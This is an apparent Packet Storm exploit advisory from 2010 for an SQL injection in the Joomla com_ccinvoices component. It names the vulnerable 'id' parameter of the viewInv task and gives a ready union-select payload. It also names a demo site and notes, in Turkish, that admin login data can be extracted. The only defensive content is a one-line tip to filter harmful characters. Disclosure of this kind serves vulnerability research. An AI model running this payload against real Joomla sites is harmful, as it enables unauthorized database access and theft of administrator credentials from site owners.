Joomla CCInvoices SQL Injection

2010-11-05T00:00:00
ID PACKETSTORM:95558
Type packetstorm
Reporter Fl0riX
Modified 2010-11-05T00:00:00

Description

                                        
                                            `  
<------------------- header data start ------------------- >  
#############################################################  
Joomla Component ccinvoices SQL Injection Vulnerability   
#############################################################  
  
# Author : Fl0riX ~ Bug Researchers  
  
# Name : Joomla com_ccinvoices  
  
# Bug Type : SQL injection  
  
# Infection : Admin Login Bilgileri Alinabilir.  
  
# Demo Vuln :  
[+]index.php?option=com_ccinvoices&task=viewInv&id=[EXPLOIT]  
  
[+] Demo Site:http://cctestweb.com/demo/  
  
# Note: register in site & Login with ur account.  
  
# Note 2: Demo Account : http://cctestweb.com/demo/  
  
# Bug Fix Advice : Zararli Karakterler Filtrenmelidir.  
#############################################################  
< ------------------- header data end of ------------------- >  
< -- bug code start -- >  
EXPLOIT :  
null+and+1=0+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24  
< -- bug code end of -- >   
  
`